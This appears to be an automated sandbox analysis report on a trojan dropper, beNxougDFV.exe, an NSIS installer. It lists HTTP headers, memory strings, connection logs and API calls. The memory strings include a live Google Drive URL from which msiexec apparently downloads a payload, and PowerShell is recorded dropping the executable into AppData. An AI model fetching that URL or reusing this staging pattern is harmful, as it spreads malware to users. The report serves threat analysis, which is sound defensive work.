Sec-CH-UA-Platform-VersionPermissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=*Content-Length: 1652X-GUploader-UploadID: AFiumC7Lo2ZmvrRpsn4sG1lpRqNbmdjRbW5ywkF3oqofr8qj_A6U35OdeHsGOUJNNBbaOmH5vGBlPF9bNgServer: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Tue, 03 Dec 2024 15:42:35 GMTCross-Origin-Opener-Policy: same-originContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'nonce-K_qU7H1h0y8laEanXZv6wQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistPermissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=*Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652X-GUploader-UploadID: AFiumC4GWqdxQdMKEwD_13wPbSvXh3p_XI2PrwtnNmRknO_EtAUbhXcriud0FoZ6G-5YjWtBBUiEzAuK5gServer: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Tue, 03 Dec 2024 15:42:41 GMTContent-Security-Policy: script-src 'nonce-g0yU3za_5L0SxthWSXDTjw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistPermissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originContent-Length: 1652X-GUploader-UploadID: AFiumC5a9glzorMvCoxJ1eOytCN6c4Pm9J1eGB44HAU8OQPTsh0hZaicFUBPkmhIfAipwZ9gGPrbDkRbYwServer: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Tue, 03 Dec 2024 15:42:47 GMTContent-Security-Policy: script-src 'nonce-2x3hlxUn2hfgTaPr_UuFOA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistCross-Origin-Opener-Policy: same-originPermissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652X-GUploader-UploadID: AFiumC7C-c8H1h2722goJP3tpQ84Ob2Ihon4k1h-1gncRhYz9Ux-A9nVZxj-r2o5LzKC9-ieiHEU64ARlwServer: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close

Source: beNxougDFV.exe, beNxougDFV.exe.2.dr	String found in binary or memory: http://nsis.sf.net/NSIS_Error
Source: beNxougDFV.exe, beNxougDFV.exe.2.dr	String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: msiexec.exe, 00000007.00000003.2521068299.0000000009860000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2323066299.000000000985F000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000002.2601099669.0000000009861000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000002.2601099669.000000000984A000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2548831592.000000000985E000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2265787447.0000000009861000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://apis.google.com
Source: msiexec.exe, 00000007.00000003.2577354844.0000000009861000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2493563781.000000000985C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://dhttps://drive.usercontent.google.com/download?id=1QYcmFXnrRWth2b0SOECGCfUV-uNnbJgW&export=d
Source: msiexec.exe, 00000007.00000003.2323066299.000000000985F000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000002.2601099669.0000000009861000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/
Source: msiexec.exe, 00000007.00000003.2577354844.0000000009861000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2548831592.0000000009861000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000002.2601099669.0000000009861000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/#pMR=
Source: msiexec.exe, 00000007.00000002.2601099669.00000000097EA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/cmFXnrRWth2b0SOECGCfUV-uNnbJgW&export=download
Source: msiexec.exe, 00000007.00000002.2601099669.00000000097EA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/cmFXnrRWth2b0SOECGCfUV-uNnbJgW&export=download6Q
Source: msiexec.exe, 00000007.00000003.2350547385.0000000009861000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2378544297.0000000009860000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2323066299.000000000985F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/cq
Source: msiexec.exe, 00000007.00000002.2601099669.00000000097EA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/ificate
Source: msiexec.exe, 00000007.00000002.2601099669.0000000009861000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/rcontent.google.com/download?id=1QYcmFXnrRWth2b0SOECGCfUV-uNnbJgW&export=do
Source: msiexec.exe, 00000007.00000002.2601099669.000000000982F000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2435501502.000000000983E000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2493563781.000000000983E000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2520985349.000000000983E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/s
Source: msiexec.exe, 00000007.00000002.2601099669.0000000009861000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/uc?export=download&id=1QYcmFXnrRWth2b0SOECGCfUV-uNnbJgW
Source: msiexec.exe, 00000007.00000002.2601099669.00000000097EA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/uc?export=download&id=1QYcmFXnrRWth2b0SOECGCfUV-uNnbJgW$
Source: msiexec.exe, 00000007.00000003.2350547385.0000000009861000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2577354844.0000000009861000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2378544297.0000000009860000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2520985349.000000000985C000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2548831592.0000000009861000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2435471529.0000000009860000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2493563781.000000000985C000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2521068299.0000000009860000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2323066299.000000000985F000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000002.2601099669.0000000009861000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/uc?export=download&id=1QYcmFXnrRWth2b0SOECGCfUV-uNnbJgW0&
Source: msiexec.exe, 00000007.00000002.2601099669.00000000097EA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/uc?export=download&id=1QYcmFXnrRWth2b0SOECGCfUV-uNnbJgW3.5
Source: msiexec.exe, 00000007.00000003.2577354844.0000000009861000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2520985349.000000000985C000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2548831592.0000000009861000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2493563781.000000000985C000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2521068299.0000000009860000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000002.2601099669.0000000009861000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/uc?export=download&id=1QYcmFXnrRWth2b0SOECGCfUV-uNnbJgWECGCfUV-uNnbJgW6y
Source: msiexec.exe, 00000007.00000002.2601099669.00000000097EA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/uc?export=download&id=1QYcmFXnrRWth2b0SOECGCfUV-uNnbJgWfceS
Source: msiexec.exe, 00000007.00000003.2577354844.0000000009861000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2378544297.0000000009860000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2520985349.000000000985C000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2548831592.0000000009861000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2435471529.0000000009860000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2493563781.000000000985C000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2521068299.0000000009860000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000002.2601099669.0000000009861000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/uc?export=download&id=1QYcmFXnrRWth2b0SOECGCfUV-uNnbJgWfx
Source: msiexec.exe, 00000007.00000003.2577354844.0000000009861000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2520985349.000000000985C000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2548831592.0000000009861000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2435471529.0000000009860000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2493563781.000000000985C000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2521068299.0000000009860000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000002.2601099669.0000000009861000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/uc?export=download&id=1QYcmFXnrRWth2b0SOECGCfUV-uNnbJgWroso
Source: msiexec.exe, 00000007.00000002.2601099669.0000000009861000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/uc?export=download&id=1QYcmFXnrRWth2b0SOECGCfUV-uNnbJgWst
Source: msiexec.exe, 00000007.00000003.2577354844.0000000009861000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2548831592.0000000009861000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000002.2601099669.0000000009861000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/uc?export=download&id=1QYcmFXnrRWth2b0SOECGCfUV-uNnbJgWt
Source: msiexec.exe, 00000007.00000003.2435471529.0000000009860000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/uc?export=download&id=1QYcmFXnrRWth2b0SOECGCfUV-uNnbJgWvy
Source: msiexec.exe, 00000007.00000003.2435471529.0000000009860000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/uc?export=download&id=1QYcmFXnrRWth2b0SOECGCfUV-uNnbJgW~
Source: msiexec.exe, 00000007.00000002.2601099669.000000000984A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.usercontent.google.com/
Source: msiexec.exe, 00000007.00000003.2350547385.0000000009861000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2577354844.0000000009861000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2378544297.0000000009860000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2520985349.000000000985C000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2548831592.0000000009861000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2294517511.0000000009861000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2435471529.0000000009860000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2493563781.000000000985C000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2521068299.0000000009860000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2323066299.000000000985F000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000002.2601099669.0000000009861000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.usercontent.google.com/)rLS
Source: msiexec.exe, 00000007.00000003.2435501502.000000000984A000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2493563781.000000000984A000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2520985349.000000000984A000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000002.2601099669.000000000984A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.usercontent.google.com/c
Source: msiexec.exe, 00000007.00000002.2601099669.000000000984A000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2265787447.0000000009861000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.usercontent.google.com/download?id=1QYcmFXnrRWth2b0SOECGCfUV-uNnbJgW&export=download
Source: msiexec.exe, 00000007.00000002.2601099669.00000000097EA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.usercontent.google.com/download?id=1QYcmFXnrRWth2b0SOECGCfUV-uNnbJgW&export=downloade2
Source: msiexec.exe, 00000007.00000003.2493563781.000000000985C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.usercontent.google.com/download?id=1QYcmFXnrRWth2b0SOECGCfUV-uNnbJgW&export=downloadf
Source: msiexec.exe, 00000007.00000002.2601099669.00000000097EA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.usercontent.google.com/download?id=1QYcmFXnrRWth2b0SOECGCfUV-uNnbJgW&export=downloadj
Source: msiexec.exe, 00000007.00000002.2601099669.00000000097EA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.usercontent.google.com/download?id=1QYcmFXnrRWth2b0SOECGCfUV-uNnbJgW&export=downloadt
Source: msiexec.exe, 00000007.00000002.2601099669.00000000097EA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.usercontent.google.com/download?id=1QYcmFXnrRWth2b0SOECGCfUV-uNnbJgW&export=downloadx
Source: msiexec.exe, 00000007.00000003.2435471529.0000000009860000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.usercontent.google.com/download?id=1QYcmFXnrRWth2b0SOECGCfUV-uNnbJgW&export=downloady
Source: msiexec.exe, 00000007.00000003.2493563781.000000000984A000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2520985349.000000000984A000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000002.2601099669.000000000984A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.usercontent.google.com/s
Source: msiexec.exe, 00000007.00000003.2521068299.0000000009860000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2323066299.000000000985F000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000002.2601099669.0000000009861000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000002.2601099669.000000000984A000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2548831592.000000000985E000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2265787447.0000000009861000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ssl.gstatic.com
Source: msiexec.exe, 00000007.00000003.2378544297.0000000009860000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://translate.googl
Source: msiexec.exe, 00000007.00000002.2601099669.000000000984A000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2548831592.000000000985E000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2265787447.0000000009861000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://translate.google.com/translate_a/element.js
Source: msiexec.exe, 00000007.00000002.2601099669.000000000982F000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2435501502.000000000983E000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2493563781.000000000983E000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2520985349.000000000983E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://translate.googleapis.com/_/translate_http/_/js/;reporm
Source: msiexec.exe, 00000007.00000002.2601099669.000000000984A000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2548831592.000000000985E000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2265787447.0000000009861000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://translate.googleapis.com/_/translate_http/_/js/;report-uri
Source: msiexec.exe, 00000007.00000002.2601099669.000000000984A000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2548831592.000000000985E000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2265787447.0000000009861000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.google-analytics.com/analytics.js
Source: msiexec.exe, 00000007.00000003.2521068299.0000000009860000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2323066299.000000000985F000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000002.2601099669.0000000009861000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000002.2601099669.000000000984A000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2548831592.000000000985E000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2265787447.0000000009861000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.google-analytics.com;report-uri
Source: msiexec.exe, 00000007.00000003.2521068299.0000000009860000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2323066299.000000000985F000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000002.2601099669.0000000009861000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000002.2601099669.000000000984A000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2548831592.000000000985E000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2265787447.0000000009861000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com
Source: msiexec.exe, 00000007.00000003.2521068299.0000000009860000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2323066299.000000000985F000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000002.2601099669.0000000009861000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000002.2601099669.000000000984A000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2548831592.000000000985E000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2265787447.0000000009861000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.googletagmanager.com
Source: msiexec.exe, 00000007.00000003.2521068299.0000000009860000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2323066299.000000000985F000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000002.2601099669.0000000009861000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000002.2601099669.000000000984A000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2548831592.000000000985E000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2265787447.0000000009861000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.gstatic.com

Source: unknown	Network traffic detected: HTTP traffic on port 49945 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49960
Source: unknown	Network traffic detected: HTTP traffic on port 49966 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49930 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49914 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49908 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49937 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49937
Source: unknown	Network traffic detected: HTTP traffic on port 49977 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49914
Source: unknown	Network traffic detected: HTTP traffic on port 49902 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49977
Source: unknown	Network traffic detected: HTTP traffic on port 49973 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49930
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49952
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49973
Source: unknown	Network traffic detected: HTTP traffic on port 49923 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49952 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49893
Source: unknown	Network traffic detected: HTTP traffic on port 49893 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49960 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49908
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49902
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49923
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49945
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49966

Source: unknown	HTTPS traffic detected: 172.217.19.174:443 -> 192.168.2.10:49893 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 142.250.181.1:443 -> 192.168.2.10:49902 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.217.19.174:443 -> 192.168.2.10:49908 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.217.19.174:443 -> 192.168.2.10:49923 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 142.250.181.1:443 -> 192.168.2.10:49930 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.217.19.174:443 -> 192.168.2.10:49937 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.217.19.174:443 -> 192.168.2.10:49952 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 142.250.181.1:443 -> 192.168.2.10:49973 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.217.19.174:443 -> 192.168.2.10:49977 version: TLS 1.2

Source: C:\Users\user\Desktop\beNxougDFV.exe

Code function: 0_2_00405194 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,GlobalUnlock,SetClipboardData,CloseClipboard,

0_2_00405194

System Summary

Powershell drops PE file

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Local\unshabbily\beNxougDFV.exe

Jump to dropped file

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Process Stats: CPU usage > 49%

Source: C:\Users\user\Desktop\beNxougDFV.exe

Code function: 0_2_004031BB EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,

0_2_004031BB

Source: C:\Users\user\Desktop\beNxougDFV.exe	Code function: 0_2_004049D3		0_2_004049D3
Source: C:\Users\user\Desktop\beNxougDFV.exe	Code function: 0_2_004065BB		0_2_004065BB

Source: beNxougDFV.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE

Source: classification engine

Classification label: mal100.troj.evad.winEXE@6/14@2/2

Source: C:\Users\user\Desktop\beNxougDFV.exe

0_2_004031BB

Source: C:\Users\user\Desktop\beNxougDFV.exe

Code function: 0_2_00404460 GetDlgItem,SetWindowTextA,SHBrowseForFolderA,CoTaskMemFree,lstrcmpiA,lstrcatA,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA,

0_2_00404460

Source: C:\Users\user\Desktop\beNxougDFV.exe

Code function: 0_2_004020CB CoCreateInstance,MultiByteToWideChar,

0_2_004020CB

Source: C:\Users\user\Desktop\beNxougDFV.exe

